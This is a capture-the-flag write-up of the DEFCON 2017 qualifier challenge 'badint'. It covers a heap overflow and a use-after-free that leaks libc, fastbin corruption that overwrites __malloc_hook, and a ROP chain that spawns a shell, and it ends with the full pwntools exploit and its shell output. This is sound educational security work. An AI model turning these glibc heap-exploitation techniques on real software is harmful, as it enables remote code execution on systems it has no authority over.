DEFCON CTF 2017 Qualifier - badint

Enjoy some badint at badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me:21813

Attachment: badint libc.so xpl.py

Team: Samurai

SEQ #: 0
Offset: 0
Data: AAAABBBB
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 4
Data: CCCCDDDD
LSF Yes/No: Yes
RX PDU [0] [len=4]
Assembled [seq: 0]: aaaabbbbccccdddd

By playing around with the service, it quickly becomes clear, that we can define different data chunks, which will be put together as soon as we affirm LSF.

Assembling them will create a new chunk and copy the previously defined chunks at the specified offsets into it.

SEQ #: 0
Offset: 0
Data: AAAABBBB
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 8
Data: CCCCDDDD
LSF Yes/No: No
RX PDU [0] [len=4]
SEQ #: 0
Offset: 12
Data: EEEEFFFF
LSF Yes/No: Yes
RX PDU [0] [len=4]
Assembled [seq: 0]: aaaabbbb00000000ccccdddd

The binary itself contained quite a lot of functions. Luckily enough, after getting a rough idea of how the chunks are allocated and filled, I took a break on reversing and started playing around with the heap instead. In the end, this worked out pretty well, since it was all about heap corruption.

Stripped pseudo-code:

int void inputHandler()
{  
  	while (true)
  	{
    	printf("SEQ #: ");
    	fgets(&s, 255, stdin);      
    	seqNo = atol(&s);    
    
    	printf("Offset: ");
    	fgets(&s, 255, stdin);      
    	offset = atol(&s);
    
    	printf("Data: ", 255LL);
    	fgets(&s, 768, stdin);
    
    	inputChunk = (void *)createDataChunk(&s, &v9, &v9);

		printf("LSF Yes/No: ", &v9);
		fgets(&s, 768, stdin);

		if (s == "Yes")
			assembleChunks = 1;
		else
			assembleChunks = 0;
 
		printf("RX PDU [%d] [len=%d]\n", seqNo, v9);
		createPDUChunk(*(&qword_604100 + seqNo), offset, inputChunk, v9);
		
		delete(inputChunk);

		if ( assembleChunks )
		{
	  		finalChunk = assemblePDUs(*(&qword_604100 + seqNo), &v8, &v8);
	  		
	  		printf("Assembled [seq: %u]: ", seqNo);

	  		for ( i = 0; i < v8; ++i )
	    		printf("%02x", *((_BYTE *)finalChunk + i));

	  		puts("\n");

	  		delete(finalChunk);
		}    
  	}  	
}

So, when we specify a data chunk, the binary will create an input chunk and hex-encodes our input into it (AAAABBBB becomes 0xaaaabbbb). Then it creates a copy of that chunk (data chunk) and a pdu chunk, which contains the meta-information for this part of the sequence (offset, pointer to data, …). After creating the pdu chunk, the initial input chunk gets freed.

If we specified LSF with “Yes”, it will create a final chunk and copy the previously entered data into this at the corresponding offsets. Yet it misses to check, if the specified offset is inside the boundaries of this chunk.

This gives us the possibility to overwrite arbitrary values behind the chunk on the heap!

Let’s verify this:

SEQ #: 0
Offset: 0
Data: AAAABBBBCCCCDDDDEEEEFFFF
LSF Yes/No: No
RX PDU [0] [len=12]

Heap:

0x61a000:	0x0000000000000000	0x0000000000000000
0x61a010:	0x0000000000000000	0x0000000000000000
0x61a020:	0x0000000000000000	0x0000000000000021
0x61a030:	0x0000000000000000	0x00000000ffffeeee	<-- Input Chunk / Final chunk
0x61a040:	0x0000000000000000	0x0000000000000031
0x61a050:	0x0000000000000000	0x0000000000000000	<-- PDU Chunk
0x61a060:	0x0000000000616c28	0x00000000000c0000
0x61a070:	0x000000000061a080	0x0000000000000021
0x61a080:	0xddddccccbbbbaaaa	0x00000000ffffeeee	<-- Data Chunk
0x61a090:	0x0000000000000000	0x000000000001cf71
0x61a0a0:	0x0000000000000000	0x0000000000000000
0x61a0b0:	0x0000000000000000	0x0000000000000000

For a quick poc, we’ll just overwrite 0x61a090, which is at offset 96 relative to our input chunk (which will serve as final chunk on assembly, since it gets freed before the final chunk is allocated and both have the same size)

SEQ #: 0
Offset: 0
Data: AAAABBBBCCCCDDDDEEEEFFFF
LSF Yes/No: No
RX PDU [0] [len=12]
SEQ #: 0
Offset: 96
Data: AAAABBBBCCCCDDDD
LSF Yes/No: Yes
RX PDU [0] [len=8]
Assembled [seq: 0]: aaaabbbbccccddddeeeeffff0000000000000000

Heap:

0x61a000:	0x0000000000000000	0x0000000000000000
0x61a010:	0x0000000000000000	0x0000000000000000
0x61a020:	0x0000000000000000	0x0000000000000021
0x61a030:	0x0000000000000000	0x00000000ffffeeee	<-- Input Chunk
0x61a040:	0x0000000000000000	0x0000000000000031	
0x61a050:	0x000000000061a090	0x0000000000000000	<-- PDU Chunk
0x61a060:	0x0000000000000000	0x00000000000c0000
0x61a070:	0x000000000061a080	0x0000000000000021
0x61a080:	0xddddccccbbbbaaaa	0x00000000ffffeeee	<-- Data Chunk
0x61a090:	0xddddccccbbbbaaaa	0x0000000000000031	<-- Overwritten
0x61a0a0:	0x0000000000000000	0x000000000061a050
0x61a0b0:	0x0000000000000000	0x0000000000080060
0x61a0c0:	0x000000000061a0d0	0x0000000000000021
0x61a0d0:	0xddddccccbbbbaaaa	0x0000000000000000
0x61a0e0:	0x0000000000000000	0x000000000001cf21
0x61a0f0:	0x0000000000000000	0x0000000000000000
0x61a100:	0x0000000000000000	0x0000000000000000

So, we have an (almost) arbitrary write on the heap. Since badint allocates and frees a lot of fastbins, fastbin corruption shouldn’t be hard to achieve.

Leaking libc

The behaviour for the chunk assembly also introduces an use-after-free vulnerability. The final chunk won’t be zeroed out on creation. Thus, we can define mutliple data chunks at one offset (increasing the size of the final chunk), while letting others uninitialized (thanks to ebeip90 and nilch for pointing that out).

# First sequence

SEQ #: 0
Offset: 0
Data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
LSF Yes/No: Yes
RX PDU [0] [len=24]
Assembled [seq: 0]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

# New sequence

SEQ #: 0
Offset: 12
Data: BBBBBBBBBBBBBBBB
LSF Yes/No: No
RX PDU [0] [len=8]
SEQ #: 0
Offset: 12
Data: BBBBBBBBBBBBBBBB
LSF Yes/No: Yes
RX PDU [0] [len=8]
Assembled [seq: 0]: 0000000000000000aaaaaaaabbbbbbbb	<-- Those a's are remains from the first sequence

We can use that to obtain a libc address. Just need to create a data chunk, whose size is larger than fastbin size. When the input chunk gets freed, its FD/BK will get populated with pointers to main_arena. Again, since the input chunk gets freed before the final chunk gets allocated, the final chunk will occupy the same memory area.

With an appropriate offset, we’ll be able to leak the FD pointer.

...

def sendSeq(seq, offset, data, lsf, rec=True):
	r.sendlineafter(":", str(seq))
	r.sendlineafter("Offset:", str(offset))
	r.sendlineafter("Data:", data)
	
	if (rec):
		r.recvuntil(":")
		if lsf:
			r.sendline("Yes")
		else:
			r.sendline("No")

def exploit():
	log.info("Leak LIBC base")

	sendSeq(0, 8, ('B'*0x80).encode("hex"), True)	
	
	data = r.recvuntil("0000").split(":")[2].strip()
	
	LEAK = u64(data.decode("hex"))	
	LIBC = LEAK - 0x3be7b8

Might be too verbose, but watching the heap should make it easier to understand, what’s happening, while the chunks get assembled.

At first, the input chunk will be created, and our input gets stored there:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091	<- Input chunk
0x61ac30:	0x4242424242424242	0x4242424242424242	
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000000	0x000000000001c351

After this, it will create the PDU chunk on the heap, and copy the input chunk into a new data chunk:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091	<- Input chunk
0x61ac30:	0x4242424242424242	0x4242424242424242	
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000000	0x0000000000000031	<- PDU chunk
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000616c28	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091	<- Data chunk
0x61acf0:	0x4242424242424242	0x4242424242424242	
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

It will then free the input chunk and since it’s not a fastbin, it will be put into unsorted bin list and FD/BK will be populated with pointers to main_arena:

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091
0x61ac30:	0x00007ffff7636b58	0x00007ffff7636b58	<- FD/BK populated
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000090	0x0000000000000030  
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000616c28	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Since we chose to assemble the sequence immediately, it will now allocate the final chunk. Malloc will serve us the previous input chunk for that. The assembly function then copies our input from the data pointer to offset 8 in the final chunk, letting FD untouched.

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000091
0x61ac30:	0x00007ffff7636b58	0x4242424242424242	<- Final chunk
0x61ac40:	0x4242424242424242	0x4242424242424242
0x61ac50:	0x4242424242424242	0x4242424242424242
0x61ac60:	0x4242424242424242	0x4242424242424242
0x61ac70:	0x4242424242424242	0x4242424242424242
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x4242424242424242	0x0000000000000031	<- Overwriting prev size
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000800008
0x61ace0:	0x000000000061acf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Assembled [seq: 0]: 586b63f7ff7f0000424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242\n

Now that we have the base address of libc, we can start with corrupting the heap in order to get code execution.

Fastbin corruption

The idea behind fastbin corruption is to overwrite the FD pointer of a freed fastbin with an address of our choice. When this fastbin gets allocated another time, it will put our fake address into the fastbin list. This will mislead malloc into thinking, that there’s another freed fastbin at this address, which could be reused at a following allocation (as long as the fake chunk at this address fulfills some restrictions, that is).

If we succeed in tricking malloc to assume, that our fake address is a valid chunk, we can use this chunk to get an arbitrary write to that address. Used this to overwrite __malloc_hook, which will be called by malloc when allocating new chunks, thus calling our injected address.

Though, overwriting __malloc_hook is a little bit tricky, since we don’t control the data around it. Just passing the address of __malloc_hook into the fastbin list will fail, since it doesn’t have a valid size field.

But we can get around this by misaligning our chunk (uafio showed this in BabyHeap2017)

On allocation of a fastbin, malloc checks, that the size field of the target chunk matches the one of the index of the fastbin.

0x7fbd777d5720 <__memalign_hook>:   0x00007fbd7749ac90	0x0000000000000000	
0x7fbd777d5730 <__realloc_hook>:    0x00007fbd7749ac30	0x0000000000000000	<- prev size / size
0x7fbd777d5740 <__malloc_hook>:     0x0000000000000000	0x0000000000000000	<- target

If we’d now just pass the address of malloc hook for our fake fastbin, it would interpret 0x7fbd777d5738 (=> 0x0) as the chunk size, which will make the malloc checks fail.

0x7fbd777d572d:	0xbd7749ac30000000	0x000000000000007f	<- Misaligned realloc hook / Fake size (now in fastbin size range)
0x7fbd777d573d:	0x0000000000000000	0x0000000000000000	<- __malloc_hook
0x7fbd777d574d:	0x0000000000000000	0x0000000000000000
0x7fbd777d575d:	0x0000000000000000	0x00006a0000000000

But by misaligning the address to 0x7fbd777d572d, malloc would interpret 0x7f as size, thus passing the checks and allocating this as a fastbin chunk.

Exploiting it

So much for the theory, let’s see, how this all can be applied to the challenge service.

First, we’ll need to forge an appropriate heap structure. Since we can only overwrite values behind the final chunk, we have to make sure that the fastbin, whose values we want to overwrite, is positioned behind it.

To ensure this, I first created a smaller chunk (size 0x16) and then a bigger chunk (size 0x60):

log.info("Create fastbin chunks and free them to populate fastbin list")
	
sendSeq(0, 0, "A"*0x16*2, True)	
sendSeq(0, 0, "B"*0x60*2, True)

Heap after first sequence

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021	<- Input/Final buffer of first seq
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa	<- Data buffer
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000051	
0x61ac70:	0x00007ffff7636b58	0x00007ffff7636b58	<- Remains from LIBC leak
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000050	0x0000000000000030	<- PDU chunk
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000160000
0x61ace0:	0x000000000061ac50	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242	<- Remains from LIBC leak
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x000000000001c291

Heap after second sequence

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021	<- Input/Final buffer of first seq (small chunk)
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021	
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa	<- Data chunk (first seq)
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000051
0x61ac70:	0x00007ffff7636b98	0x00007ffff7636b98	<- Remains from LIBC leak
0x61ac80:	0x4242424242424242	0x4242424242424242
0x61ac90:	0x4242424242424242	0x4242424242424242
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000050	0x0000000000000030	<- PDU chunk (second seq)
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000600000
0x61ace0:	0x000000000061adf0	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242	<- Remains from LIBC leak
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x0000000000000071	<- Final chunk of second seq (big chunk)
0x61ad80:	0x0000000000000000	0xbbbbbbbbbbbbbbbb	<- FD (0x0) of final chunk
0x61ad90:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ada0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adb0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adc0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61add0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ade0:	0x0000000000000000	0x0000000000000071	<- Data chunk (second seq)
0x61adf0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae00:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae10:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae20:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae30:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae40:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae50:	0x0000000000000000	0x000000000001c1b1

$ p main_arena
$15 = {
  mutex = 0x0, 
  flags = 0x0, 
  fastbinsY = {0x61ac20, 0x61acb0, 0x0, 0x0, 0x0, 0x61ad70, 0x0, 0x0, 0x0, 0x0}, 
  top = 0x61ae50, 
  last_remainder = 0x61ac60,

The final chunk for the second sequence was allocated at 0x61ad70 and then got freed. Thus, it was put into the fastbin list (see fastbinsY[5]). If we would now allocate another fastbin with the same size, malloc would give us this chunk again and puts its FD pointer (currently 0x0) into the fastbin list. But if we overwrite the FD pointer with the (misaligned) address of __malloc_hook before allocating a new fastbin, it will put that address into the fastbin list instead. The next allocation with a size around 0x70 will then return a chunk overlapping __malloc_hook, enabling us to overwrite it with arbitrary data.

So we just have to create a new (small) data chunk with offset 0x150 (0x61ad80 (target) - 0x61ac30 (input buffer for small chunks)) and assemble it. The assembled chunk will be created at 0x61ac30 and our data chunk will be copied to offset 0x150 from there, thus landing in 0x61ad80 (FD pointer for the chunk in fastbinsY[5])

log.info("Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list")
		
sendSeq(0, 0x150, addr(MALLOC_HOOK), True)

0x61ac00:	0x0000000000000000	0x0000000000000000
0x61ac10:	0x0000000000000000	0x0000000000000000
0x61ac20:	0x0000000000000000	0x0000000000000021
0x61ac30:	0x0000000000000000	0xaaaaaaaaaaaaaaaa	<-- Input/Final chunk
0x61ac40:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac50:	0xaaaaaaaaaaaaaaaa	0xaaaaaaaaaaaaaaaa
0x61ac60:	0x4242aaaaaaaaaaaa	0x0000000000000021
0x61ac70:	0x00007ffff7636acd	0x00007ffff7636b98
0x61ac80:	0x4242424242424242	0x0000000000000031
0x61ac90:	0x00007ffff7636b58	0x00007ffff7636b58
0x61aca0:	0x4242424242424242	0x4242424242424242
0x61acb0:	0x0000000000000030	0x0000000000000030
0x61acc0:	0x0000000000000000	0x0000000000000000
0x61acd0:	0x0000000000000000	0x0000000000080150
0x61ace0:	0x000000000061ac70	0x0000000000000091
0x61acf0:	0x4242424242424242	0x4242424242424242
0x61ad00:	0x4242424242424242	0x4242424242424242
0x61ad10:	0x4242424242424242	0x4242424242424242
0x61ad20:	0x4242424242424242	0x4242424242424242
0x61ad30:	0x4242424242424242	0x4242424242424242
0x61ad40:	0x4242424242424242	0x4242424242424242
0x61ad50:	0x4242424242424242	0x4242424242424242
0x61ad60:	0x4242424242424242	0x4242424242424242
0x61ad70:	0x0000000000000000	0x0000000000000071
0x61ad80:	0x00007ffff7636acd	0xbbbbbbbbbbbbbbbb	<-- FD pointer overwritten
0x61ad90:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ada0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adb0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61adc0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61add0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ade0:	0x0000000000000000	0x0000000000000071
0x61adf0:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae00:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae10:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae20:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae30:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae40:	0xbbbbbbbbbbbbbbbb	0xbbbbbbbbbbbbbbbb
0x61ae50:	0x0000000000000000	0x000000000001c1b1

The input buffer for the next sequence will now be created at 0x61ad70, stuffing our fake address into fastbin list. Allocating the final chunk will then serve a chunk overlapping __malloc_hook. When the binary assembles our sequence, it will copy our input to that chunk, thus overwriting the hook.

log.info("Allocate chunk to overwrite MALLOC_HOOK")
		
payload = "\x01"*(0x6)
payload += addr(0xdeadbeef)			# malloc_hook
payload += "\x01"*(0x60*2-len(payload))	# pad size

sendSeq(0, 0, payload, False)

0x7f43b2d55720 <__memalign_hook>:   0x00007f43b2a1ac90	0x0000000000000000
0x7f43b2d55730 <__realloc_hook>:    0x00007f43b2a1ac30	0x0000000000000000
0x7f43b2d55740 <__malloc_hook>:     0x00000000deadbeef	0x0000000000000000	<- hook overwritten

On the next allocation, malloc will execute __malloc_hook, jumping to the address we wrote there.

void *__libc_malloc (size_t bytes)
{
	mstate ar_ptr;
  	void *victim;

  	void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);

  	if (__builtin_expect (hook != NULL, 0))
		return (*hook)(bytes, RETURN_ADDRESS (0));

  	arena_get (ar_ptr, bytes);

So, we’ve got code execution. Searched for a one_gadget, sure enough I’d be seeing a shell very soon. And so I did… locally…

While execve("/bin/sh", 0, 0) worked on my machine, popping a shell, the remote service wasn’t really happy about it:

XXXXXXXXXXXXXXXXXX: applet not found"

Wuss? Luckily enough, Zach (ebeip90) pointed out, that the remote services are running busybox, which would be the reason that execve("/bin/sh", 0, 0) fails and we’d have to do an execve("/bin/sh", ["sh"], 0) instead.

So, one_gadget was no longer an option, since I didn’t have an address for an array containing “sh”. After some more failures trying to get the gadget working anyways, I finally switched to stack pivoting and preparing a rop chain on the stack.

The rop chain would basically read user input to a known address (0x604900). With that, we can setup the array for argv (pointer to “sh” / “sh”) and then call execve ("/bin/sh", 0x604900, 0).

A possible stack pivoting gadget can be found in libc:

0x000000000002c1e9: add rsp, 0x90; pop rbx; pop rbp; pop r12; ret;

This basically is add rsp, 0xa8, which will land in our input buffer.

log.info("Allocate chunk to overwrite MALLOC_HOOK")

# Pivot stack to the rop chain
payload = "\x01"*(0x6)
payload += addr(ADDESP)		# add rsp, 0xa8
payload += "\x01"*(0x60*2-len(payload))

sendSeq(0, 0, payload, False)

log.info("Send ROP chain")

payload = p64(0)*6		# Padding
	
# read(0, 0x604900, 24)
payload += p64(POPRAX)
payload += p64(0x0)
payload += p64(POPRDI)
payload += p64(0x0)
payload += p64(POPRSI)
payload += p64(0x604900)
payload += p64(POPRDX)
payload += p64(24)
payload += p64(SYSCALL)

# execve("/bin/sh", ["sh"], 0)
payload += p64(POPRAX)
payload += p64(59)
payload += p64(POPRDI)
payload += p64(BINSH)
payload += p64(POPRSI)
payload += p64(0x604900)	# array will be stored here after read
payload += p64(POPRDX)
payload += p64(0x0)
payload += p64(SYSCALL)
	
# Padding payload, so correct fast bin chunk will be used
payload += "\x02"*(0x60*2-len(payload))

sendSeq(0, 0, payload, False, False)

log.info("Send SH array")		

payload = p64(0x604910)			# Pointer to SH
payload += p64(0x0)
payload += "sh\x00\x00\x00\x00\x00\x00"	# SH 

r.sendline(payload)

r.interactive()

Since our data gets read by fgets(&s, 768, stdin), our input will get stored onto the stack first. When malloc now tries to allocate the chunk to store our input, it will call __malloc_hook, which is now pointing to the add rsp, 0xa8 gadget. This will move the stack pointer to the start of our rop chain, thus executing it.

The rop chain will then wait for input to store at 0x604900, for which we’ll send the data to construct the argv array.

Now we should be able to call execve in a way, that hopefully executes even on the remote service:

$ python xpl.py 1
[+] Opening connection to badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me on port 21813: Done
[*] Leak LIBC base
[+] LIBC leak       : 0x7f2a6a94d7b8
[+] LIBC base       : 0x7f2a6a58f000
[+] MALLOC_HOOK     : 0x7f2a6a94d72d
[+] ADDESP          : 0x7f2a6a5bb1e7
[*] Prepare fastbin list
[*] Create fastbin chunks and free them to populate fastbin list
[*] Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list
[*] Allocate chunk to overwrite MALLOC_HOOK
[*] Send ROP chain
[*] Send SH array
[*] Switching to interactive mode
 $ ls
badint
flag
$ cat flag
The flag is: All ints are not the same... A239... Some can be bad ints!

Final exploit

#!/usr/bin/python
from pwn import *

HOST = "badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me"
PORT = 21813

def sendSeq(seq, offset, data, lsf, rec=True):
	r.sendlineafter(":", str(seq))
	r.sendlineafter("Offset:", str(offset))
	r.sendlineafter("Data:", data)
	
	if (rec):
		r.recvuntil(":")
		if lsf:
			r.sendline("Yes")
		else:
			r.sendline("No")

def addr(a):
	return p64(a).encode("hex")

def exploit():		
	log.info("Leak LIBC base")

	sendSeq(0, 8, ('B'*0x80).encode("hex"), True)	
	
	data = r.recvuntil("0000").split(":")[2].strip()
	
	LEAK = u64(data.decode("hex"))	
	LIBC = LEAK - 0x3be7b8

	# Calculate gadgets
	MALLOC_HOOK 	= LEAK - 0x8b	
	ADDESP  	= LIBC + 0x000000000002c1e7		# Add RSP, 0xa8
	POPRAX  	= LIBC + 0x000000000001b218
	POPRSI  	= LIBC + 0x0000000000024805
	POPRDI  	= LIBC + 0x0000000000022b1a
	POPRDX  	= LIBC + 0x0000000000001b8e
	BINSH   	= LIBC + 0x000000000017ccdb
	SYSCALL 	= LIBC + 0x00000000000c1e55
	RET     	= LIBC + 0x0000000000088c85

	log.success("LIBC leak       : %s" % hex(LEAK))
	log.success("LIBC base       : %s" % hex(LIBC))
	log.success("MALLOC_HOOK     : %s" % hex(MALLOC_HOOK))
	log.success("ADDESP          : %s" % hex(ADDESP))

	log.info("Prepare fastbin list")
	
	log.info("Create fastbin chunks and free them to populate fastbin list")
	
	sendSeq(0, 0, "A"*0x16*2, True)		
	sendSeq(0, 0, "B"*0x60*2, True)
		
	log.info("Overwrite Fastbin FD and get pointer to MALLOC_HOOK into fastbin list")
		
	sendSeq(0, 0x150, addr(MALLOC_HOOK), True)
	
	log.info("Allocate chunk to overwrite MALLOC_HOOK")
	
	# Pivot stack to the rop chain
	payload = "\x01"*(0x6)
	payload += addr(ADDESP)		
	payload += "\x01"*(0x60*2-len(payload))

	sendSeq(0, 0, payload, False)

	log.info("Send ROP chain")
	
	payload = p64(0)*6				# Padding
		
	# read(0, 0x604900, 24)
	payload += p64(POPRAX)
	payload += p64(0x0)
	payload += p64(POPRDI)
	payload += p64(0x0)
	payload += p64(POPRSI)
	payload += p64(0x604900)
	payload += p64(POPRDX)
	payload += p64(24)
	payload += p64(SYSCALL)

	# execve("/bin/sh", ["sh"], 0)
	payload += p64(POPRAX)
	payload += p64(59)
	payload += p64(POPRDI)
	payload += p64(BINSH)
	payload += p64(POPRSI)
	payload += p64(0x604900)
	payload += p64(POPRDX)
	payload += p64(0x0)
	payload += p64(SYSCALL)
		
	# Padding payload up, so correct fast bin chunk will be used
	payload += "\x02"*(0x60*2-len(payload))

	sendSeq(0, 0, payload, False, False)

	log.info("Send SH array")		

	payload = p64(0x604910)			# Pointer to SH
	payload += p64(0x0)
	payload += "sh\x00\x00\x00\x00\x00\x00"	# SH

	r.sendline(payload)

	r.interactive()

	return

if __name__ == "__main__":	
	if len(sys.argv) > 1:
		r = remote(HOST, PORT)
		exploit()
	else:
		r = process("./badint", env={"LD_PRELOAD" : "./libc.so"})

		print util.proc.pidof(r)
		pause()
		exploit()